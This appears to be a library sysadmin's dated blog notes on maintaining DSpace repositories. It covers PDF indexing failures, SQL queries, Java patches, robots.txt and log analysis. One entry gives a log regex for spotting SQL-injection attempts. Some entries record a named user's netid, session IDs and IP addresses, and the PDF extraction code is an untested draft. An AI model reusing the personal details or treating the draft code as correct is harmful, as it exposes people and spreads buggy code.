vendor_id : GenuineIntel
cpu family : 15
model : 4
model name : Intel(R) Pentium(R) 4 CPU 3.20GHz
stepping : 3
cpu MHz : 3200.166
cache size : 2048 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 1
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 5
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr
bogomips : 6404.36
clflush size : 64
processor : 1
vendor_id : GenuineIntel
cpu family : 15
model : 4
model name : Intel(R) Pentium(R) 4 CPU 3.20GHz
stepping : 3
cpu MHz : 3200.166
cache size : 2048 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 1
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 5
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr
bogomips : 6400.17
clflush size : 64

free -m (without pdfbox running)
             total       used       free     shared    buffers     cached
Mem:          2018       1428        590          0        229       1045
-/+ buffers/cache:        153       1865
Swap:         3812         31       3781

Code sample

I rewrote the getDestinationStream method in the DSPACE class PDFFilter to extract text in blocks of 50 pages. The new version of the method is given below:

    public InputStream getDestinationStream(InputStream source) throws Exception {
    
        System.out.println("Extracting text");

        long startTime = System.currentTimeMillis();
        // get input stream from bitstream
        // pass to filter, get string back
        PDFTextStripper TextExtractor = new PDFTextStripper();
        PDFParser parser = null;
        String extractedText = null;
        int NumberPagesInPDF =0;
        try
        {
            parser = new PDFParser(source);
            parser.parse();
            
            extractedText = " " ;
            int SizeOfPDFSection = 50;
            PDDocument PDFtoExtract = new PDDocument(parser.getDocument());
            NumberPagesInPDF = PDFtoExtract.getNumberOfPages();
            int StartPage = 0;
            int EndPage = 0;
            while (StartPage < NumberPagesInPDF){
              EndPage = StartPage + SizeOfPDFSection;
              TextExtractor.setStartPage( StartPage );
              TextExtractor.setEndPage( EndPage );
              extractedText += TextExtractor.getText(PDFtoExtract);
              StartPage = EndPage;
            }
            
            // get the last few pageses at the end of the pdf
            TextExtractor.setStartPage( StartPage - SizeOfPDFSection );
            TextExtractor.setEndPage( NumberPagesInPDF -1 );
            extractedText += TextExtractor.getText(PDFtoExtract);
        }
        finally
        {
            try
            {
                parser.getDocument().close();
            }
            catch(Exception e)
            {
               log.error("Error closing temporary PDF file: " + e.getMessage(), e);
            }
        }

        // if verbose flag is set, print out extracted text
        // to STDOUT
        if (MediaFilterManager.isVerbose)
        {
            System.out.println(extractedText);
        }

        // generate an input stream with the extracted text
        long stopTime = System.currentTimeMillis();
        long deltaSeconds = (stopTime-startTime)/1000;
        System.out.println(" NumberPagesInPDF " + NumberPagesInPDF);
        System.out.println("Extraction time seconds " + deltaSeconds );
        System.out.println("s "  + (double)NumberPagesInPDF/(double)deltaSeconds  );
        System.out.println(" Number of characters extracted " + extractedText.length());
        byte[] textBytes = extractedText.getBytes();
        ByteArrayInputStream bais = new ByteArrayInputStream(textBytes);
        return bais; // will this work? or will the byte array be out of scope?
    }
}

                              
                              
                           

June 15, 2010

Possible solution to large sets of PDFs not being indexed.

1) Currently all the bitstreams for all the pdfs are being read into memory by DSPACE before indexing starts.

2) General idea: make an array of bitstream.internal_id and produce file names from these. Open them one at a time, as files and process them. There will have to be an if to catch PDF filters. A new version of the processBitstream method will have to be written in the MediaFilter.java class.
3) Determine if a filter is PDF. In MediaFilterManager the line:

filterClasses[i].getClass().getName()
produces a String of the form:
org.dspace.app.mediafilter.PDFFilter

4)In Bundle.java is an example of a database query in DSPACE:

TableRowIterator tri = DatabaseManager.queryTable( ourContext, "bitstream", "SELECT bitstream.* FROM bitstream, bundle2bitstream WHERE " + "bundle2bitstream.bitstream_id=bitstream.bitstream_id AND " + "bundle2bitstream.bundle_id= ? ", bundleRow.getIntColumn("bundle_id"));
5) A query that will get the bitstream.internal_id from the handle:

select handle.handle,bitstream.internal_id from handle,item2bundle,bitstream,bundle2bitstream where handle.resource_id = item2bundle.item_id and handle.resource_type_id=2 and item2bundle.bundle_id=bundle2bitstream.bundle_id and bundle2bitstream.bitstream_id = bitstream.bitstream_id and bitstream.name ~ '^.*pdf$' order by handle::text::integer;

6) The SQL query produces an output like.

handle | internal_id
--------+-----------------------------------------
4 | 21235899611297801355164539089367487918
6 | 107336362058605133394783483256748994425
7 | 11090457400765004032181753363050906238
8 | 15085152857357519261000291360441738392
9 | 107871098203799408458667072002741710893
11 | 50276060641731470155592232786626559701
12 | 65101419339422847404612669026873496384
13 | 43890973756880840755046786472676911568
15 | 160770701110516817178377325959276903855
16 | 65016360752601910182437228650469824124
7) Finding the handle

int Handle = Integer.parseInt(myItem.getHandle());

June 11, 2010

PDF files that are not being indexed SQL to look at the issue

The problem

Beth found that the item with handle 56385 http://conservancy.umn.edu/handle/56385 had not gone through the full text indexer.
The command
/dspace/dspace-ir/bin/filter-media -i 56385
Will index just that one file. Here is the error mess that you get.
ErrorMediaFilter
This error message indicates the the error is coming from the third party jar: PDFBox.jar.

Some SQL

Below is an SQL query that pulls out all of the files that are pdfs in the repository:
select handle.handle,bitstream.name, bitstream.description from handle,item2bundle,bitstream,bundle2bitstream where handle.resource_id = item2bundle.item_id and handle.resource_type_id=2 and item2bundle.bundle_id=bundle2bitstream.bundle_id and bundle2bitstream.bitstream_id = bitstream.bitstream_id and bitstream.name ~ '^.*pdf$' order by handle::text::integer;

Next is an SQL query that finds all the PDFs that have been indexed:
select handle.handle,bitstream.name, bitstream.description from handle,item2bundle,bitstream,bundle2bitstream where handle.resource_id = item2bundle.item_id and handle.resource_type_id=2 and item2bundle.bundle_id=bundle2bitstream.bundle_id and bundle2bitstream.bitstream_id = bitstream.bitstream_id and bitstream.description = 'Extracted text' order by handle::text::integer;

Current number of unindexed fields

# PDFs - 14477
# Indexed _ 13252

# Unindexed 1225

May 5, 2010

SQL: extracting the purl and title from dspace given a handle

dspace_sr=> select text_value from metadatavalue, handle where metadata_field_id=25 AND item_id=handle.resource_id and handle=49928;

text_value
---------------------------
http://purl.umn.edu/49928
dspace_sr=> select text_value from metadatavalue, handle where metadata_field_id=64 AND item_id=handle.resource_id and handle=49928;

text_value
-------------------------------------------------------------------------------------------
Food-safety Standards and Farmers Health: Evidence from Kenyan’s Export Vegetable Growers

May 4, 2010

DSPACE performance problem traced to file of indices missing

Summary sent to users

For the last 25 - 30 hours there has been major troubles on the AgEcon side. It turns out that the file containing all the data from the index all run was missing. Lacking this file produced a large number of bizarre and severe problems, I have run index all on the AgEcon side and the system now seems to be OK. I can only guess that the last index all failed and the file was not created. Several parts of they system rely on this file and failed. I am curios. How much trouble did you see on the UDC side.

Symptoms

Spikes to over 100% cpu usesage on both strip1 (tomcat) and strip3 (postgres) boxes
search fails
browse fails
epeople could not be created
input form fails after being partially filled out
bouncing tomcat and postgres produce only minutes of proper behavior

Some technical details

The file:
/dspace/assetstore/dspace-sr/search/segments
was missing. One of the error messages pointed to this problem. This file is the output of the indexer
I ran the command to reindex the metadata:

dsrun org.dspace.search.DSIndexer -c &

As soon as the command above started, the users could enter upload files and do searches. It has been about six hours since the metadata was indexed and all seems well.

eperson table

Initially I thought the problem may be in the eperson table. I do not believe that this is the case. There were 2003 epeople and I found a three that were clearly flawed:

Here is what we want an eperson to look like:

Table "public.eperson"
Column | Type | Modifiers
---------------------+-----------------------------+-----------
eperson_id | integer | not null
email | character varying(64) |
password | character varying(64) |
firstname | character varying(64) |
lastname | character varying(64) |
can_log_in | boolean |
require_certificate | boolean |
self_registered | boolean |
last_active | timestamp without time zone |
sub_frequency | integer |
phone | character varying(32) |
netid | character varying(64) |
Indexes:
"eperson_pkey" primary key, btree (eperson_id)
"eperson_email_key" unique, btree (email)
"eperson_email_idx" btree (email)
"eperson_netid_idx" btree (netid)

So the epeople were missing passwords and other critical fields. They were all deleted.
426 | newuser426 | | | | | | | | |
93 | newuser93 | | | | | | | | |
486 | aaea@umn.edu | | Registration | aaea09 | t | f | | | |

cpu performance plots

The problem happened on May 3 and into May 4. strip1-cpu.tiff strip3-cpu.tiff Raw cpu data

Some commands found along the way

get postgres processes

Postgresql equivalent of Mysql 'SHOW PROCESSLIST' SELECT * FROM PG_STAT_ACTIVITY;

April 27, 2010

Batch Ingest into DSPACE based on EXCEL

Introduction

Below is a procedure for ingesting data into DSPACE based on excel. Basically the user inputs a zip file that has an excel file with the metadata in it and also a subdirectory with the assets. This is converted into subdirectories with dc xml and the corresponding asset, that can be consumed by the DSPACE ingest system. Finally a perl script calls the ItemIngest class and all the metadata and assets are ingested. ExcelBatchIngest.jpg

Files

DCBatch.java.html
batch_ingest.pl.html
Sample Excel file
IngestMetaData.xls

December 11, 2009

DSPACE metadata and Google scholar

From an email Julie sent

I came across this info on some DSpace list, and thought it might help our cause with getting GS to better index AgEcon and the UDC: Providing metatags used by Google Scholar for enhanced indexing Maybe it's old news to those in the know. I was rummaging around looking for info about DSpace and Zotero.

I checked the link and there is a desire for DSPACE to provide this out of the box.

Links on the subject

Nature's Metadata for Web Pages
Below is the standard for putting metadata in html.
Expressing Dublin Core metadata using HTML/XHTML meta and link elements

Difficult to improve standing

From Publish or Perish Frequently Asked Questions

Other results issues How do I improve the accuracy with which Google Scholar lists my papers? In general, this is rather difficult, because a lot depends on the accuracy with which your papers are referenced by others. However, if you have separate web pages for each of your papers, then Google Scholar advises that you can add several meta tags to your pages to help Google's crawler to list your paper. In particular, they recommend using the following tags (replace the content="..." bits with your own information): <meta name="citation_journal_title" content="Journal Name"> <meta name="citation_authors" content="Last Name1, First Name1; Last Name2, First Name2"> <meta name="citation_title" content="Article Title"> <meta name="citation_date" content="01/01/2007"> <meta name="citation_volume" content="10"> <meta name="citation_issue" content="1"> <meta name="citation_firstpage" content="1"> <meta name="citation_lastpage" content="15"> <meta name="citation_doi" content="10.1074/jbc.M309524200"> <meta name="citation_pdf_url" content="http://www.publishername.org/10/1/1.pdf"> <meta name="citation_abstract_html_url" content="http://www.publishername.org/cgi/content/abstract/10/1/1"> <meta name="citation_fulltext_html_url" content="http://www.publishername.org/cgi/content/full/10/1/1"> <meta name="dc.Contributor" content="Last Name1, First Name1"> <meta name="dc.Contributor" content="Last Name2, First Name2"> <meta name="dc.Title" content="Article Title"> <meta name="dc.Date" content="01/01/2007"> <meta name="citation_publisher" content="Publisher Name">

December 8, 2009

Config file change to make DSAPCE properly handle unicode filenames

On strip1 the AgEcon instance was not properly downloading files that had non-ascii file names. That is it was not handling unicode characters correctly. This was corrected by fixing a config file. File to edit on strip1: tu nano tomcat/conf/server.xml Old bad line: <!-- Define an AJP 1.3 Connector on port 8009 --> <Connector port="8009" UIEncoding="UTF-8" tomcatAuthentication="false" enableLookups="false" redirectPort="8443" protocol="AJP/1.3" /> New fixed line: <!-- Define an AJP 1.3 Connector on port 8009 --> <Connector port="8009" URIEncoding="UTF-8" tomcatAuthentication="false" enableLookups="false" redirectPort="8443" protocol="AJP/1.3" />
i.e. change UIEncoding to URIEncoding

Things learned along the way:
1) Location of constant to encode strings as UTF-8 in DSPACE
./src/org/dspace/core/Constants.java:209: public static final String DEFAULT_ENCODING = "UTF-8";
2) Servlet that does downloads of pdf's
<servlet> <servlet-name>bitstream</servlet-name> <servlet-class>org.dspace.app.webui.servlet.BitstreamServlet</servlet-class> </servlet> line 165 of ./etc/dspace-web.xml
3) Code from ./src/org/dspace/app/webui/servlet/BitstreamServlet.java that does upload: protected void doDSGet(Context context, HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException, SQLException, AuthorizeException { Item item = null; Bitstream bitstream = null; System.out.println("In dspace proper"); // Get the ID from the URL String idString = request.getPathInfo(); String handle = ""; String sequenceText = ""; String filename = null; int sequenceID; System.out.println("1 idString " + idString ); // Parse 'identifier' and 'sequence' (bitstream seq. number) out // of remaining URL path, which is typically of the format: // {identifier}/{sequence}/{bitstream-name} // But since the bitstream name MAY have any number of "/"s in // it, we scan from the start to pick out the sequence: String [] pathArray = HandleManager.splitIdentifier(idString); handle = pathArray[0]; System.out.println("1.5 handle " + handle ); String extraInfo = pathArray[1]; System.out.println("2 extraInfo " + extraInfo ); if(extraInfo != null) { // Remove leading slash if any: if(extraInfo.startsWith("/")) { extraInfo = extraInfo.substring(1); } // The sequence is before the first slash, everything // else is part of the bitstream-name. int slashIndex = extraInfo.indexOf('/'); if(slashIndex != -1) { sequenceText = extraInfo.substring(0,slashIndex); filename = extraInfo.substring(slashIndex+1); } } System.out.println("3 sequenceText " + sequenceText ); try { sequenceID = Integer.parseInt(sequenceText); System.out.println("4 sequenceID " + sequenceID ); } catch (NumberFormatException nfe) { sequenceID = -1; } // Now try and retrieve the item DSpaceObject dso = HandleManager.resolveToObject(context, handle); // Make sure we have valid item and sequence number if (dso != null && dso.getType() == Constants.ITEM && sequenceID >= 0) { item = (Item) dso; if (item.isWithdrawn()) { log.info(LogManager.getHeader(context, "view_bitstream", "handle=" + handle + ",withdrawn=true")); JSPManager.showJSP(request, response, "/tombstone.jsp"); return; } boolean found = false; Bundle[] bundles = item.getBundles(); for (int i = 0; (i < bundles.length) && !found; i++) { Bitstream[] bitstreams = bundles[i].getBitstreams(); for (int k = 0; (k < bitstreams.length) && !found; k++) { if (sequenceID == bitstreams[k].getSequenceID()) { bitstream = bitstreams[k]; found = true; } } } } if (bitstream == null || filename == null || !filename.equals(bitstream.getName())) { // No bitstream found or filename was wrong -- ID invalid log.info(LogManager.getHeader(context, "invalid_id", "path=" + idString)); JSPManager.showInvalidIDError(request, response, idString, Constants.BITSTREAM); return; } // log.fatal(LogManager.getHeader(context, "view_bitstream", // "bitstream_id=" + bitstream.getID())); // Modification date // TODO: Currently the date of the item, since we don't have dates // for files response.setDateHeader("Last-Modified", item.getLastModified().getTime()); // Check for if-modified-since header long modSince = request.getDateHeader("If-Modified-Since"); if (modSince != -1 && item.getLastModified().getTime() < modSince) { // Item has not been modified since requested date, // hence bitstream has not; return 304 response.setStatus(HttpServletResponse.SC_NOT_MODIFIED); return; } // Pipe the bits InputStream is = bitstream.retrieve(); // Set the response MIME type response.setContentType(bitstream.getFormat().getMIMEType()); // Response length response.setHeader("Content-Length", String.valueOf(bitstream.getSize())); Utils.bufferedCopy(is, response.getOutputStream()); is.close(); response.getOutputStream().flush(); } 4) html generated for download before the fix: <tr><td headers="t1" class="standard">12_Felföldi_Apstract.pdf</td><td headers="t2" class="standard"></td><td headers="t3" class="standard">77Kb</td><td headers="t4" class="standard">PDF</td><td class="standard" align="center"><a target="_blank" href="/bitstream/55410/3/12_Felf%c3%b6ldi_Apstract.pdf">View/Open</a></td></tr> note 12_Felföldi_Apstract.pdf != 12_Felf%c3%b6ldi_Apstract.pdf 5) servlet that generates the above html is: ./src/org/dspace/app/webui/jsptag/ItemTag.java

November 3, 2009

DC Metadata fields used by UMN DSPACE instances:

dc.title
dc.title.alternative
dc.contributor.author
dc.contributor.editor
dc.subject
dc.subject.other
dc.date.issued
dc.identifier.citation
dc.relation.ispartofseries
dc.description.abstract
dc.description
dc.identifier.govdoc
dc.identifier.uri
dc.identifier.isbn
dc.identifier.issn
dc.identifier.ismn
dc.identifier
dc.relation
dc.format.extent
dc.language
dc.extent

September 15, 2009

dspace batch ingest

Format of files to ingest

Here is a breakdown of the files : batch_files - top level directory (name does not matter)
       I
   Ingest1   - This a prototype for the directories that you will create.  Give these directories any name you want
            I
         contents                                            -    contains  the asset name.  The fields are separated by a single tab.  File must  be called "contents"
        dublin_core.xml                                - contains the DC metadata.  This file must be called "dublin_core.xml" 
        UDCsubmissionguidelines.pdf     - This is the asset.  You may use whatever name you want.  However the name of the
                                                                       asset must appear in the "contents" file.

tarball that gives working sample of the directory structure.

command

/dspace/dspace-ir/bin$ ./dsrun org.dspace.app.itemimport.ItemImport -a -c CollectionHandle -e Eperson -s /PATH_TO_BATCH_FILES/batch_files -m /home//PATH_TO_BATCH_FILESs/Ingest1/mapfile.txt

Resources

Dorothea Salo's EXCELLENT blog
ingest-export.ppt ARD Prasad
ScalabilityIssues - DSpace Wikis

September 14, 2009

putting captchas into dspace using jcaptcha

ingest-export.ppt

code needed for a captcha

The file form.jsp had to be modified so that if the captcha was not set or was not correct the form for the email form was not produced.
If the email form was not called then a jsp was called that produced the captcha: captcha_main.jsp The jsp captcha_main.jsp called in order the following java classes to make the captcha image:
ImageCaptchaServlet.java
CaptchaServiceSingleton.java
MyImageCaptchaEngine.java
Also the file dspace-web.xml had to be modified.

X11 not on the box where tomcat runs

If X11 is not the box with tomcat, you will get an error like "port 6000 not available". To fix this put:

-Djava.awt.headless=true

into the catalina.sh file.

Helpful links

How to use jsp-forward tag
How do I perform browser redirection from a JSP pages
Breaking a Visual CAPTCHA

August 31, 2009

Error in DSPACE search ... handles from index not having items

Symptom

Hi, I was checking abstracts for Volume 41 No. 2 of Journal of Agricultural and Applied Economics. When I searched on "Race, Gender, School . . ." I got an error message saying that the website had experienced an internal error and I tried it again w/ the same results. Since the same message requested letting you know of the problem I am responding. Sincerely,

Error Message

Trying the search above generated the error message: An internal server error occurred on http://ageconsearch.umn.edu: Date: 8/28/09 10:59 AM Session ID: 6AAEA1B2D8AADD0C7F1BE28731AE9083 -- URL Was: http://ageconsearch.umn.edu/simple-search?sort=date&query=%28%28keyword%3Arace%29%29&from_advanced=true&query2=&field1=keyword&conjunction2=AND&query1=race+&field2=keyword&query3=&conjunction1=AND&field3=ANY&SortDirection=descending -- Method: GET -- Parameters were: -- field3: "ANY" -- field2: "keyword" -- field1: "keyword" -- sort: "date" -- query3: "" -- query2: "" -- SortDirection: "descending" -- query1: "race " -- query: "((keyword:race))" -- from_advanced: "true" -- conjunction2: "AND" -- conjunction1: "AND" Exception: java.sql.SQLException: Query "((keyword:race))" returned unresolvable handle: 53087 at org.dspace.app.webui.servlet.SimpleSearchServlet.doDSGet(SimpleSearchServlet.java:271) at org.dspace.app.webui.servlet.DSpaceServlet.processRequest(DSpaceServlet.java:151) at org.dspace.app.webui.servlet.DSpaceServlet.doGet(DSpaceServlet.java:99) at javax.servlet.http.HttpServlet.service(HttpServlet.java:689) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:252) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:173) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:178) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:126) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:105) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:107) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:148) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:199) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:282) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:767) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:697) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:889) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:684) at java.lang.Thread.run(Thread.java:595)

Outline of Solution

1) A handle was found by search that was not in the database (probably a deleted file and IndexAll has not run yet).
2) I found the segment of code that collects into a list all the items found by search.
3) When any word that was on this deleted record was input, the search routine would throw an error and halt.
4) I rewrote the code to ignore handles that are not in the database.
5) Ran a few basic tests on Odin (our private DSAPCE setup).
6) Deployed it to strip1 (production site)

Modified Code

// FROM SimpleSearchServlet.java /* resultsItems = new Item[numItems]; for (int i = 0; i < numItems; i++) { String myhandle = (String) itemHandles.get(i); Object o = HandleManager.resolveToObject(context, myhandle); resultsItems[i] = (Item) o; if (resultsItems[i] == null) { throw new SQLException("Query \"" + query + "\" returned unresolvable handle: " + myhandle); } } */ // The code below will only add handles to the list if a well defined // item is associated with it. Item[] resultsItems_temp = new Item[numItems]; int item_count =0; for (int i = 0; i < numItems; i++){ String myhandle = (String) itemHandles.get(i); Object o = HandleManager.resolveToObject(context, myhandle); if (o != null){ resultsItems_temp[item_count] = (Item) o; item_count++; } } resultsItems = new Item[item_count]; for (int i = 0; i < item_count; i++){ resultsItems[i] = resultsItems_temp [i]; }

August 7, 2009

Problem with a dspace user and solution

Problem


A problem that happened once before. Although Erin George has successfully uploaded files to some of the collections in the Univeresity Archives community, she is now if a cycle where she logs in, goes to a collection, and whatever she does gets cycled back to the log in screen with her x500 there but no password. She enters her password, and goes through the same thing again and again. This happened to one of our students.

Solution

This command fixed it:
update eperson set netid = 'georg038' where eperson_id = '190';

June 26, 2009

changing feedback email in dspace

The code for creating an email for feedback in dspace only allows 1 recipient: Email email = ConfigurationManager.getEmail("feedback"); email.addRecipient(ConfigurationManager.getProperty ("feedback.recipient")); While the email for admin allows a comma separated list of recipients: String AdminEmail = ConfigurationManager.getProperty("admin.emails"); String EmailsAddresses[] = AdminEmail.split(","); for (int i = 0; i < EmailsAddresses.length ; i++) { email.addRecipient(EmailsAddresses[i]); } I took parts of the admin code and applied it to the feedback part of dspace. Now feedback email supports a comma separated list of email recipients.

June 12, 2009

SQL to get number of new items in DSPACE after a certain date

select count(date_accessioned) from ItemsByDateAccessioned where date_accessioned > '2008-07-01'::DATE ;

June 2, 2009

Looking for non unicode characters in AgEcon metadata

Problem and general solution

Some non unicode characters have gotten into the dspace metadata. We need to find them. I will print out the meta data fields to an file of the form below. <doc> text from metadata pull </doc> Then I will run the file through xmllint.

sql needed

The line below will get all the valid item_ids.
SELECT item.item_id from item, handle where handle.resource_id=item.item_id;

The line below will pull a metadata field for a given item id.
select text_value from metadatavalue where metadata_field_id=43 AND item_id=36450;
For this query, the Series/Report will be obtained for an item with item_id=36450.

Metadata fields to check

metadata_field_id name
3 author
15 date issued
25 uri
27 abstract
40 Institution/Association
43 Series/Report
57 Keyword
63 JEL Codes
64 Title
67 email
This list came from AgEconMetadata.htm

May 24, 2009

Memory Leak in DSPACE

There is a memory leak in DSAPCE.
I have tried:
1) Making a more strict robots.txt file:

User-agent: *
Disallow: /browse-subject
Disallow: /browse-author
Disallow: /browse-title
Disallow: /browse-date
Disallow: /suggest
Disallow: /*/browse-subject
Disallow: /*/browse-author
Disallow: /*/browse-title
Disallow: /*/browse-date
Disallow: /image
Disallow: /feed
Disallow: /password-login
Disallow: /advanced-search

This change (especially the Disallow: /feed ) seems to have reduced cpu load, but the leak is still there.
2) A user group suggested shutting off the string cache. I tried this but it did not seem to help. 3) Also a site suggests that there is memory leak in tomcat 5.x. The site suggests that I upgrade to tomcat 6.x I haven't done this yet. 4) I will need to look in detail at output from hmap to determine where the trouble is. It is likely within the dspace app.

Install AgEcon on strip1

Install script for AgEcon on strip1

I wrote a shell script called deployAgEcon.sh. This has all the steps required to install a new version of AgEcon on strip1.

dspace.cfg config file

All information related to installing dspace on a given box is stored in the config file dspace.cfg. Below are versions for various boxes for both UDC and AgEcon: UDC on strip1
AgEcon on strip1
UDC on odin (silvi003 account)
AgEcon on odin (silvi003 account)

May 13, 2009

Eric Moore's Comments on the UDC Indexer

Eric Moore wrote a great explanation of the fields that are indexed in UDC.

May 8, 2009

New robots.txt file for dspace

I am going to use the robots.txt file below it is based on information from the dspace wiki User-agent: * Disallow: /browse-subject Disallow: /browse-author Disallow: /browse-title Disallow: /suggest Disallow: /*/browse-subject Disallow: /*/browse-author The "/suggest" corresponds to a page that sends an email to a friend.

March 9, 2009

sql for rollup stats in the dspace database

A) Find all the item handles that belong to a community with a community id of 4

SELECT handle.handle FROM community2item, handle WHERE community2item.item_id = handle.resource_id AND handle.resource_type_id = 2 AND community2item.community_id = 4

B) Turning a community handle into a resource id (community id)

SELECT handle.resource_id FROM handle WHERE handle=125 AND resource_type_id=4;

resource_id
-------------
4
Note: resource_type_id=4 means community.

C) Substitute B into A -> Item handles in terms of community handle

SELECT count (handle) FROM community2item, handle WHERE community2item.item_id = handle.resource_id AND handle.resource_type_id = 2 AND community2item.community_id = (SELECT handle.resource_id FROM handle WHERE handle=125 AND resource_type_id=4);

Note: resource_type_id=2 means item.

February 25, 2009

Dspace Handles collections with problems

Summary

In UDC there are Dspace Handles that are collections(resource_type_id =3) but do not show up in the collections table.

Finding the problem in the media filter log

I was looking at the filter media log, dspace-ir_filter-media.log, and found many errors of the form:

Exception in thread "main" java.lang.IllegalArgumentException: Cannot resolve 4394 to a DSpace object This means that when the handle was put into the static method HandleManger.resolveObject, a null resulted.

A list (handle set 1) of these handles was obtained using the UNIX command line below:

grep 'Cannot.resolve' dspace-ir_filter-media.log | perl -p -i -e 's/^.*Cannot resolve (\d+).*$/\1/g' | sort | uniq | sort -g

Look at handles that produce error inside of Postgres

One can go to the handle table and get the resource_id for one of the handles on the list. Using this resource_id, no entry can be found in the collection table. I think these are collections that were deleted. They were removed from the collection table but not from the handle table.

sql to get collection handles

old sql command ... pulls handles that have null and valid values in the collection table

The handles that were input to filter-media came from the sql cmd below:

SELECT handle FROM handle WHERE resource_type_id=3;

The above command will grab both good collection handles and handles that have no entry in the collection table.
Handles using this command (good and bad collection handles combined: handle set 2).

new sql command only pulls handles that have valid values in the collection table

The command below will only pull handles that have valid collection_ids (i.e. exist in the collection table).

SELECT handle FROM collection, handle WHERE collection_id=resource_id AND resource_type_id=3 ORDER BY handle::text::integer;

Handles using improved command handle set 3 (only handles that exist in the collection table).

Quick sanity check

handle set 1 maps to null collections.
handle set 2 maps to all collections in the handle table both null and non-null.
handle set 3 maps to non-null collections

So we would expect:
1) There to be no overlap between handle set 1 and handle set 3.
2) The combined contents of handle set 1 and handle set 3 should be equal to the contents of handle set 2.
Both 1 and 2 are correct.

February 13, 2009

java code in dspace to get collections an item belongs to

From Item.java we find: TableRowIterator tri = DatabaseManager.queryTabl(ourContext,"collection", "SELECT collection.* FROM collection, collection2item WHERE " + "collection2item.collection_id=collection.collection_id AND " + "collection2item.item_id= ? ", itemRow.getIntColumn("item_id"));

October 14, 2008

Test media filter ... DSPACE UDC side

This media should be filtered:

http://purl.umn.edu/5842

Keywords:

Austin Catholic November physician

October 9, 2008

Check that handle.resource_id=item.item_id

The command:
SELECT handle.* from item, handle where handle.resource_id=item.item_id and handle = 2204;
yields:
handle_id handle resource_type_id resource_id
5 2204 2 2
The command:
SELECT item.* from item, handle where handle.resource_id=item.item_id and handle = 2204;
yields:
item_id submitter_id in_archive withdrawn last_modified owning_collection
2 1 t f 2007-12-13 16:53:15.767-06 1
Finally the command:
select * from itemsbytitle where item_id=2;
yields:
items_by_title_id item_id title sort_title
3727 2 xponentially growing solutions for inverse problems in PDE xponentially growing solutions for inverse problems in pde


All of this implies that the URL:
https://odin.lib.umn.edu:9031/dspace-ir/handle/2204
Will resolve to a record with the title:
xponentially growing solutions for inverse problems in PDE
This is what happens.

October 4, 2008

part of regex to find sql attacks

| grep 'DECLARE.*CHAR.*SET.*CAST' |

sql cmd for dspace

Insert dspace type logs into the University of Minho stats addon

INSERT INTO stats.log (date, logger, priority, message) VALUES
('2008-09-19 11:45:22,672', 'org.dspace.app.webui.servlet.DSpaceServlet', 'INFO',
'anonymous:session_id=85E693CBBCBD74DB561B2D2DBEDD0E2B:ip_addr=128.101.29.84:
view_item:handle=2854');

Find the delta t for an item that has a handle 7113

select ('2008-03-07 21:44:01.797-06' - (select item.last_modified from item, handle where handle.resource_id=item.item_id and handle=7113));

Find handles that have been modified since epoch 1197586394

SELECT handle, EXTRACT(EPOCH FROM item.last_modified) from item, handle where handle.resource_id=item.item_id and EXTRACT(EPOCH FROM item.last_modified) > 1197586394 order by handle;

Bitstream from handle

select bundle2bitstream.bitstream_id from item2bundle, handle, bundle2bitstream where (handle.handle=31045 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id);
bitstream_id
--------------
3976

handle from Bitstream

dspace_sr=> select handle.handle from item2bundle, handle, bundle2bitstream where (bundle2bitstream.bitstream_id=3976 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id);
handle
--------
31045
(1 row)

Collections that are children of a given community

SELECT handle FROM community2collection, handle WHERE community2collection.collection_id = handle.resource_id AND handle.resource_type_id = 3 AND community2collection.community_id = (SELECT resource_id FROM handle WHERE resource_type_id=4 AND handle=1);

communities that are children of a given community

SELECT handle FROM community2community, handle WHERE community2community.child_comm_id = handle.resource_id AND handle.resource_type_id = 4 AND community2community.parent_comm_id = (SELECT resource_id FROM handle WHERE resource_type_id=4 AND handle=1);

some ips that wormly uses

We are using wormly to monitor our dspace instances. The apache logs give a few ips that wormly uses

apache_pattern_ip.pl -d -r '\"-\" \"\"' ageconsearch_access.log_2008-09-21
72.51.35.173 node-x2j54.wormly.com.
69.60.118.203 node-sp711.wormly.com.
125.214.66.62 node-aux9e3.wormly.com.
81.171.111.142 node4.wormly.com.
66.228.123.50 clover.wormly.com.
207.210.96.85 node3.wormly.com.


Note the perl script apache_pattern_ip.pl gives the ips of all the log entries that match the given regex.

September 30, 2008

Translating apache log format to dspace

Introduction

There are basically two types of log files that must be handled: views and downloads.

Downloads

Comparison of apache and dspace logs

From apache logs:
